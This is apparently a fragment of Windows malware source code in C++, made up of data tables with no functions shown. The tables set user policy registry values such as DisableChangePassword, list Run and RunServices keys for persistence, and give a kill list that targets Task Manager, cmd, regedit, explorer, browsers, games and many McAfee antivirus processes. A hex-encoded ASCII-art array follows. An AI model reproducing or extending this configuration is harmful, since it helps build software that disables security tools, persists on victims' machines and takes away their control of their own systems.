
unsigned char reg_chars_count = 6;

const HKEY reg_key[6]
{
    HKEY_CURRENT_USER,
    HKEY_CURRENT_USER,
    HKEY_CURRENT_USER,
    HKEY_CURRENT_USER,
    HKEY_CURRENT_USER,
    HKEY_CURRENT_USER
};

const char *reg_key_chars[6]
{
    "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
    "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer"
};

const char *reg_key_names[6]
{
    "DisableTaskmgr",
    "DisableChangePassword",
    "DisableLockWorkstation",
    "DisableRegistryTools",
    "NoDispCPL",
    "NoClose"
};

const DWORD32 reg_key_value[6]
{
    0,
    1,
    0,
    0,
    0,
    0
};

unsigned char reg_chars_count_install = 8;

const HKEY reg_key_install[8]
{
    HKEY_LOCAL_MACHINE,
    HKEY_CURRENT_USER,
    HKEY_LOCAL_MACHINE,
    HKEY_CURRENT_USER,
    HKEY_LOCAL_MACHINE,
    HKEY_CURRENT_USER,
    HKEY_LOCAL_MACHINE,
    HKEY_CURRENT_USER
};

const char *reg_key_chars_install[8]
{
    "Software\\Microsoft\\Windows\\CurrentVersion",
    "Software\\Microsoft\\Windows\\CurrentVersion",
    "Software\\Microsoft\\Windows\\CurrentVersion",
    "Software\\Microsoft\\Windows\\CurrentVersion",
    "Software\\Microsoft\\Windows\\CurrentVersion",
    "Software\\Microsoft\\Windows\\CurrentVersion",
    "Software\\Microsoft\\Windows\\CurrentVersion",
    "Software\\Microsoft\\Windows\\CurrentVersion"
};

const char *reg_key_names_install[8]
{
    "RunServicesOnce",
    "RunServicesOnce",
    "RunServices",
    "RunServices",
    "RunOnce",
    "RunOnce",
    "Run",
    "Run"
};

const unsigned char exe_kill_count = 50;

const char* exe_kill[52]
{
    "taskmgr.exe", //Generic Windows Exen
    "cmd.exe",
    "regedit.exe",
    "regedit32.exe",
    "regedt32.exe",
    "regedt.exe",
    "explorer.exe",
    "conhost.exe",
    "firefox.exe", //Browser
    "iexplorer.exe",
    "chrome.exe",
    "safari.exe",
    "steam.exe", //User Apps
    "origin.exe",
    "uplay.exe",
    "hl2.exe", //User Games
    "hl.exe",
    "bf3.exe",
    "bf2.exe",
    "payday2.exe",
    "McTray.exe", //Virus McAfee
    "McScanCheck.exe",
    "MCScript_InUse.exe",
    "mfehidin.exe",
    "CmdAgent.exe",
    "FrameworkService.exe",
    "FrmInst.exe",
    "MfeServiceMgr.exe",
    "msaconfig.exe",
    "Mue.exe",
    "naPrdMgr.exe",
    "UpdaterUi.exe",
    "EegoService.exe",
    "logparser.exe",
    "mcadmin.exe",
    "mcconsol.exe",
    "mcupdate.exe",
    "mfeann.exe",
    "pireg.exe",
    "restartvse.exe",
    "scan32.exe",
    "Scan64.exe",
    "ScnDfg32.Exe",
    "shcfg32.exe",
    "shstat.exe",
    "VsTskMgr.exe",
    "wscavexe.exe",
    "Helper.exe",
    "mfevtps.exe",
    "fwinfo.exe",
    "mfehidin.exe",
    "mfefire.exe"
};

const WCHAR itsme[] =
{
    0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3B, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x23, 0x27, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x27, 0x3A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x2B, 0x2E, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2E, 0x20, 0x2C, 0x27, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x23, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3B, 0x23, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x20, 0x40, 0x23, 0x3B, 0x20, 0x20, 0x20, 0x27, 0x23, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3B, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x20, 0x23, 0x23, 0x27, 0x20, 0x20, 0x20, 0x27, 0x23, 0x2C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2C, 0x20, 0x20, 0x20, 0x20, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x20, 0x2B, 0x23, 0x2B, 0x20, 0x20, 0x20, 0x23, 0x60, 0x20, 0x20, 0x20, 0x20, 0x2E, 0x27, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2E, 0x20, 0x20, 0x20, 0x20, 0x2C, 0x60, 0x20, 0x20, 0x3B, 0x20, 0x20, 0x20, 0x23, 0x20, 0x3B, 0x27, 0x20, 0x20, 0x20, 0x20, 0x40, 0x20, 0x20, 0x20, 0x20, 0x2E, 0x23, 0x27, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x60, 0x20, 0x20, 0x20, 0x2E, 0x2C, 0x3B, 0x20, 0x20, 0x27, 0x20, 0x20, 0x2B, 0x2B, 0x20, 0x23, 0x23, 0x20, 0x20, 0x20, 0x2E, 0x40, 0x20, 0x20, 0x20, 0x20, 0x27, 0x23, 0x20, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x60, 0x20, 0x20, 0x20, 0x23, 0x3A, 0x27, 0x2C, 0x20, 0x3B, 0x20, 0x3A, 0x27, 0x3A, 0x2E, 0x3A, 0x23, 0x20, 0x20, 0x20, 0x23, 0x23, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x20, 0x2B, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2C, 0x20, 0x20, 0x2B, 0x3A, 0x27, 0x3B, 0x2E, 0x2C, 0x2C, 0x3A, 0x3B, 0x27, 0x3B, 0x2E, 0x40, 0x27, 0x3A, 0x3B, 0x2B, 0x27, 0x60, 0x20, 0x20, 0x23, 0x20, 0x2B, 0x40, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x27, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x2C, 0x3A, 0x3B, 0x2B, 0x27, 0x3A, 0x3A, 0x2C, 0x2C, 0x2C, 0x3A, 0x2C, 0x3B, 0x2B, 0x2B, 0x3B, 0x2E, 0x2E, 0x2E, 0x3A, 0x2E, 0x60, 0x60, 0x3B, 0x3B, 0x23, 0x2E, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2E, 0x23, 0x2B, 0x20, 0x20, 0x23, 0x20, 0x60, 0x20, 0x2C, 0x3B, 0x3A, 0x27, 0x23, 0x27, 0x2E, 0x3B, 0x2C, 0x3B, 0x3A, 0x2E, 0x27, 0x2B, 0x2B, 0x3A, 0x3B, 0x2C, 0x2C, 0x2E, 0x2C, 0x3A, 0x3B, 0x27, 0x3A, 0x27, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x40, 0x23, 0x2C, 0x20, 0x60, 0x23, 0x27, 0x2C, 0x2C, 0x3B, 0x2C, 0x3A, 0x23, 0x2B, 0x27, 0x3B, 0x3A, 0x3A, 0x3B, 0x3B, 0x3B, 0x27, 0x27, 0x27, 0x27, 0x3B, 0x2C, 0x2C, 0x3B, 0x2B, 0x23, 0x27, 0x2E, 0x2E, 0x2C, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x2B, 0x20, 0x2B, 0x2B, 0x3A, 0x3B, 0x3B, 0x3A, 0x3B, 0x23, 0x27, 0x27, 0x27, 0x2B, 0x23, 0x23, 0x3A, 0x27, 0x2B, 0x2B, 0x2B, 0x3B, 0x3A, 0x3A, 0x3A, 0x3B, 0x3B, 0x27, 0x3A, 0x2E, 0x2C, 0x3A, 0x20, 0x20, 0x20, 0x3A, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x2B, 0x3B, 0x23, 0x2B, 0x27, 0x27, 0x3A, 0x2B, 0x2B, 0x27, 0x3A, 0x2C, 0x2C, 0x27, 0x2B, 0x3B, 0x27, 0x3A, 0x27, 0x27, 0x3A, 0x3B, 0x2E, 0x23, 0x3A, 0x3A, 0x27, 0x27, 0x3B, 0x60, 0x3A, 0x2E, 0x20, 0x27, 0x23, 0x23, 0x3A, 0x20, 0x20, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2E, 0x2B, 0x27, 0x2E, 0x23, 0x2B, 0x23, 0x23, 0x2B, 0x3B, 0x3B, 0x3B, 0x2B, 0x2B, 0x27, 0x2C, 0x3A, 0x3B, 0x27, 0x3B, 0x2C, 0x2C, 0x3A, 0x3B, 0x2B, 0x3B, 0x2C, 0x2C, 0x3A, 0x2C, 0x3B, 0x2C, 0x3A, 0x3B, 0x2C, 0x2B, 0x2B, 0x23, 0x23, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x27, 0x60, 0x3B, 0x2B, 0x23, 0x23, 0x2B, 0x3B, 0x2B, 0x2B, 0x2B, 0x27, 0x2B, 0x23, 0x2B, 0x3A, 0x27, 0x27, 0x27, 0x27, 0x27, 0x23, 0x40, 0x23, 0x3B, 0x2C, 0x3A, 0x3A, 0x3A, 0x3A, 0x2B, 0x27, 0x2B, 0x2B, 0x27, 0x23, 0x27, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x3B, 0x2B, 0x23, 0x2B, 0x27, 0x27, 0x27, 0x23, 0x23, 0x2B, 0x2B, 0x23, 0x2E, 0x23, 0x2E, 0x3B, 0x2B, 0x2B, 0x23, 0x23, 0x27, 0x23, 0x23, 0x27, 0x3B, 0x3B, 0x3B, 0x3A, 0x27, 0x2B, 0x23, 0x2B, 0x27, 0x2C, 0x2B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x27, 0x3A, 0x3B, 0x27, 0x2B, 0x2B, 0x27, 0x27, 0x2B, 0x3B, 0x2B, 0x23, 0x23, 0x23, 0x2B, 0x3B, 0x23, 0x23, 0x2B, 0x3B, 0x27, 0x2B, 0x23, 0x23, 0x27, 0x2B, 0x23, 0x23, 0x3A, 0x3A, 0x3A, 0x3A, 0x3B, 0x2B, 0x23, 0x23, 0x2C, 0x2B, 0x3B, 0x60, 0x20, 0x20, 0x2E, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x27, 0x27, 0x27, 0x27, 0x27, 0x27, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x40, 0x23, 0x27, 0x2B, 0x27, 0x23, 0x23, 0x27, 0x27, 0x2B, 0x23, 0x3B, 0x3B, 0x3B, 0x3B, 0x3B, 0x27, 0x2B, 0x23, 0x27, 0x2B, 0x3B, 0x2E, 0x3B, 0x23, 0x60, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x23, 0x2B, 0x2B, 0x27, 0x3B, 0x27, 0x3B, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x27, 0x27, 0x27, 0x27, 0x27, 0x27, 0x27, 0x27, 0x23, 0x3B, 0x2C, 0x3A, 0x3A, 0x27, 0x2B, 0x27, 0x23, 0x27, 0x23, 0x2C, 0x27, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x60, 0x3B, 0x60, 0x20, 0x27, 0x2B, 0x2B, 0x27, 0x27, 0x2B, 0x23, 0x3A, 0x2E, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x2B, 0x27, 0x2B, 0x2B, 0x2B, 0x27, 0x3A, 0x3B, 0x27, 0x2B, 0x27, 0x2C, 0x2C, 0x2E, 0x2C, 0x3B, 0x3B, 0x23, 0x27, 0x27, 0x27, 0x60, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x3B, 0x2E, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x23, 0x2C, 0x27, 0x2B, 0x2B, 0x3B, 0x23, 0x23, 0x2B, 0x3B, 0x27, 0x2B, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x23, 0x23, 0x2B, 0x3B, 0x2C, 0x3B, 0x27, 0x2B, 0x27, 0x3B, 0x27, 0x27, 0x2E, 0x2E, 0x3A, 0x2B, 0x23, 0x23, 0x23, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x20, 0x60, 0x20, 0x20, 0x20, 0x60, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x2B, 0x23, 0x27, 0x3B, 0x20, 0x20, 0x20, 0x20, 0x23, 0x27, 0x3A, 0x27, 0x2B, 0x27, 0x23, 0x2B, 0x23, 0x2B, 0x2E, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x23, 0x2B, 0x2B, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x3A, 0x3B, 0x3B, 0x23, 0x27, 0x3B, 0x23, 0x23, 0x23, 0x27, 0x27, 0x2B, 0x23, 0x3B, 0x3B, 0x2E, 0x2B, 0x2B, 0x23, 0x2E, 0x20, 0x20, 0x2B, 0x2B, 0x2B, 0x2C, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x27, 0x23, 0x2B, 0x3A, 0x2C, 0x3A, 0x2B, 0x2B, 0x27, 0x3A, 0x3B, 0x2B, 0x23, 0x23, 0x23, 0x27, 0x40, 0x23, 0x23, 0x23, 0x23, 0x3A, 0x27, 0x3A, 0x27, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x40, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x2B, 0x27, 0x2B, 0x23, 0x2C, 0x2B, 0x2B, 0x2B, 0x27, 0x27, 0x2C, 0x2E, 0x23, 0x60, 0x20, 0x20, 0x20, 0x23, 0x23, 0x23, 0x2B, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x60, 0x3B, 0x2E, 0x27, 0x27, 0x2B, 0x23, 0x23, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x27, 0x27, 0x3A, 0x27, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x27, 0x2B, 0x3B, 0x27, 0x3B, 0x27, 0x27, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x3A, 0x2E, 0x2E, 0x2E, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3B, 0x27, 0x27, 0x2C, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x27, 0x23, 0x2B, 0x2B, 0x23, 0x23, 0x2B, 0x2B, 0x27, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x2B, 0x2B, 0x27, 0x2B, 0x3B, 0x2B, 0x27, 0x2B, 0x2B, 0x23, 0x23, 0x2B, 0x3A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x27, 0x2B, 0x3A, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x3B, 0x3B, 0x27, 0x23, 0x2B, 0x2B, 0x2B, 0x2B, 0x23, 0x2B, 0x2B, 0x27, 0x27, 0x2B, 0x27, 0x3B, 0x23, 0x27, 0x2B, 0x23, 0x23, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3A, 0x3B, 0x2B, 0x3B, 0x23, 0x23, 0x2B, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2E, 0x2C, 0x3A, 0x27, 0x2B, 0x2B, 0x2B, 0x2B, 0x23, 0x2B, 0x23, 0x23, 0x2B, 0x27, 0x27, 0x3B, 0x2B, 0x27, 0x2B, 0x3B, 0x2B, 0x2E, 0x3A, 0x20, 0x20, 0x3B, 0x23, 0x23, 0x3B, 0x2E, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3B, 0x40, 0x23, 0x2E, 0x23, 0x23, 0x27, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x3A, 0x3B, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x2B, 0x27, 0x2C, 0x27, 0x2B, 0x2B, 0x3A, 0x3B, 0x60, 0x2B, 0x23, 0x40, 0x23, 0x23, 0x23, 0x40, 0x2B, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x60, 0x60, 0x60, 0x3A, 0x40, 0x23, 0x23, 0x2B, 0x27, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x27, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x40, 0x23, 0x23, 0x27, 0x27, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x27, 0x2B, 0x23, 0x40, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x2E, 0x60, 0x20, 0x20, 0x20, 0x20, 0x27, 0x23, 0x3A, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x2B, 0x2C, 0x3A, 0x2B, 0x2B, 0x2B, 0x2B, 0x23, 0x27, 0x27, 0x2B, 0x23, 0x23, 0x40, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x3A, 0x2B, 0x23, 0x23, 0x23, 0x40, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x2B, 0x23, 0x2B, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x2B, 0x2C, 0x23, 0x2B, 0x23, 0x3B, 0x60, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x23, 0x23, 0x20, 0x20, 0x20, 0x27, 0x3A, 0x27, 0x2C, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x27, 0x2E, 0x2B, 0x23, 0x23, 0x23, 0x40, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x23, 0x23, 0x2B, 0x23, 0x40, 0x27, 0x27, 0x2B, 0x2B, 0x2B, 0x40, 0x23, 0x60, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x2B, 0x20, 0x20, 0x3A, 0x2B, 0x27, 0x3A, 0x2C, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x27, 0x2B, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x40, 0x2B, 0x23, 0x23, 0x2B, 0x2B, 0x2B, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x2B, 0x23, 0x40, 0x23, 0x23, 0x23, 0x3A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x23, 0x23, 0x23, 0x27, 0x2B, 0x3B, 0x27, 0x2B, 0x2B, 0x2B, 0x2B, 0x2B, 0x2B, 0x23, 0x23, 0x23, 0x23, 0x23, 0x2B, 0x2B, 0x23, 0x23, 0x40, 0x23, 0x23, 0x23, 0x2B, 0x3A, 0x23, 0x23, 0x23, 0x23, 0x3B, 0x27, 0x2B, 0x23, 0x23, 0x23, 0x2B, 0x23, 0x23, 0x2B, 0x23, 0x3A, 0x27, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x0A, 